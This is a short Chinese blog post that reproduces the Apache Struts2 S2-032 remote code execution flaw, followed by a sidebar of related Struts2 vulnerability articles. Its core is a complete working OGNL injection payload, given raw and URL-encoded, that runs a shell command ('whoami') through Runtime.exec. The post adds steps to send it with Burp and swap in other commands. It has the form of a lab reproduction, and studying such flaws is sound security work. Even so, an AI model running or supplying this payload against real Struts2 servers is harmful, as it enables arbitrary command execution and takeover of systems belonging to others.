Apache Struts2远程代码执行漏洞(S2-032)

最新推荐文章于 2024-07-25 09:03:24 发布
最新推荐文章于 2024-07-25 09:03:24 发布
阅读量378 收藏 1
点赞数
分类专栏: Struts2漏洞复现 文章标签: apache struts java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47493074/article/details/127027642
版权
该博客详细介绍了如何复现一个Struts2框架的漏洞,通过Burp Suite抓包并构造特定的POC,利用OGNL表达式执行命令。博客内容包括了对GET请求的参数编码过程,以及如何修改命令来读取系统信息。此文章对于理解Web安全和Struts2漏洞利用具有实践指导意义。
摘要由CSDN通过智能技术生成

漏洞复现

首先用burp对访问的页面进行抓包,然后填入以下poc

index.action?method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&pp=\\A&ppp= &encoding=UTF-8&cmd=whoami

对关键字进行编码后

index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami

使用GET方法提交
在这里插入图片描述

修改最后的cmd内容,读取内容(空格用%20编码)

在这里插入图片描述

Yolo山药
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1484
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1087
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
Struts2-032/033/037/devMode漏洞演示环境搭建
乐枕的家
07-29 5108
环境搭建 安装Java(ubuntu自带的openjdk就行) 安装Tomcat apt-get install tomcat7 下载这个含漏洞版本的struts2(已验证) https://pan.baidu.com/s/1nvpkq5z 解压,将apps文件夹下的所有示例(.war)拷贝到Tomcat下(路径默认为/var/lib/tomcat7/webapps/) 启动tomcat servi
墨者Apache Struts2远程代码执行漏洞(S2-032)复现题解
zr1213159840的博客
01-15 2748
通过以下链接,能查到s2-032漏洞信息,我们按照这个指导进行。 https://github.com/vulhub/vulhub/blob/master/struts2/s2-032/README.zh-cn.md 首先对访问的页面进行抓包,然后填入以下poc index.action?method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@g
struts2 代码执行 (CVE-2021-31805)
最新发布
qq_23003811的博客
07-25 370
漏洞由于对CVE-2020-17530的修复不完整造成的,CVE-2020-17530漏洞是由于Struts2 会对某些标签属性(比如id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 其中x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。2、漏洞验证,name=name=要有两个才能成功,payload执行whoami。1、访问/s2_062/index.action,提示参数为name。3、构造反弹连接payload。
【vulhub】Structs2 S2-032 远程代码执行漏洞(CVE-2016-3081)
weixin_42884199的博客
12-07 981
前言 4月15号安恒安全研究院在Struts 2上发现了一个严重的远程代码执行漏洞(CVE-2016-3081)(http://seclab.dbappsecurity.com.cn/?p=924),也即Struts 2的s2-032漏洞,4月26日,互联网上披露了Apache Struts 2 S2-032远程代码执行漏洞的利用代码,经测试,远程攻击者利用漏洞可在开启动态方法调用功能的Apache Struts 2服务器上执行任意代码,取得网站服务器控制权。 影响版本: Struts 2.3.20 - S
Struts2 S2-032漏洞复现
ZJT6666666的博客
01-04 510
Struts2 S2-032漏洞复现
S2-032
weixin_30802171的博客
05-05 464
前言 S2-032漏洞的影响范围是Struts 2.3.20 - Struts Struts 2.3.28,当开启了动态方法调用时可RCE。这次的漏洞分析以及后面的漏洞分析都是使用的Struts 2.3.24。在我们的第一篇文章中就讲过invokeAction方法是真正执行action中方法的地方,而低版本中式通过反射的方法来执行的,高版本中式通过Ognl表达式执行的,所以这次的S2...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
04-26
升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 ...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令执行漏洞的成因是 Struts2 标签库中的 ...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791)
qq_51577576的博客
12-16 1337
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791) Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当ActionMessage接收客户可控的参数数据时,用户可控的值添加到 ActionMessage 并在客户前端展示,导致其进入 getText 函数,最后 message 被当作 ognl 表达式执行,导致任意代码执行
Struts2漏洞检查工具
02-14
struts2检查和利用工具!
墨者学院Apache Struts2远程代码执行漏洞(S2-032)
全村的希望
10-13 384
墨者学院Apache Struts2远程代码执行漏洞(S2-032)
struts2 s2-032漏洞分析
weixin_34277853的博客
03-04 519
0x01Brief Description 最近面试几家公司,很多都问到了s2漏洞的原理,之前调试分析过java反序列化的漏洞,觉得s2漏洞应该不会太难,今天就分析了一下,然后发现其实漏洞的原理不难,但是搭建j2ee调试的环境花了将近半天的时间QAQ. StrutsApache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基...
Struts2 S2032远程代码执行漏洞分析报告 .
fin86889003的专栏
06-07 683
Struts2 S2032远程代码执行漏洞分析报告 一、漏洞基本信息 CVE编号:CVE-2016-3081 漏洞名称:Struts2 S2032远程代码执行 漏洞发布日期:2016.4.15 受影响的软件及系统:Struts2版本:Struts2 2.0.0 -2.3.28( 2.2.3(2.3.20.2和2.3.42.2不受影响) 漏洞概述:Apache Str
S2-032 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 1151
什么是STRUTS 2漏洞StrutsApache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2是Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 Struts2框架广泛应用于政府、公安、交通、金融行业和运...
S2-032远程执行代码漏洞(CVE-2016-3081)
m0_65150886的博客
01-09 479
国内安全企业安恒信息的安全研究员Nike.zheng在Struts 2上发现存在高危安全漏洞(CVE-2016-3081,S02-32),黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有struts版本。借此漏洞,攻击者可以继承Web服务程序的权限去执行系统命令(任意代码)或读写文件;Apache Struts 2是世界上最流行的Java Web服务器框架之一。1.访问http://ip:port,出现如下页面,开始实验。
Struts2-S2-032远程命令执行EXP
angaoux03775的博客
04-27 234
看到网上好多写的EXP有后门啊 还是自己写个吧! 工具下载:链接: http://pan.baidu.com/s/1miRbi2k 密码: fzfv 转载于:https://www.cnblogs.com/sevck/p/5438148.html...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-032(CVE-2016-3081)
qq_51577576的博客
11-25 505
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-032(CVE-2016-3081) Apache Struts 2是世界上最流行的Java Web服务器框架之一。Struts 2上存在高危安全漏洞(CVE-2016-3081,S02-32),黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有struts版本。
apache struts2框架命令执行漏洞(s2-045、s2-046)
01-11
Apache Struts2框架是一种流行的开源Web应用程序开发框架,但曾经发生过多个命令执行漏洞,其中包括s2-045和s2-046漏洞s2-045漏洞源于在处理远程表达式语言(OGNL)时存在安全漏洞,攻击者可以利用构造特定的HTTP请求发送恶意代码,导致服务器执行该恶意代码,从而获取系统权限。 而s2-046漏洞则是由于Struts2框架中对传入参数的处理不当,攻击者可以通过构造特定的HTTP请求,触发服务器执行恶意代码。 这两个漏洞都存在严重的安全风险,可能导致服务器受到攻击,甚至导致系统被入侵。为了防范这些漏洞,用户应该及时更新Struts2框架的最新版本,开发人员也需要对传入的参数进行严格的验证和过滤,避免恶意代码执行。此外,安全团队也应该定期对服务器进行安全漏洞扫描和修复,以确保系统的安全性。 总之,对于Apache Struts2框架的命令执行漏洞,我们需要重视并采取有效的措施来防范和修复,以确保系统的安全性和稳定性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值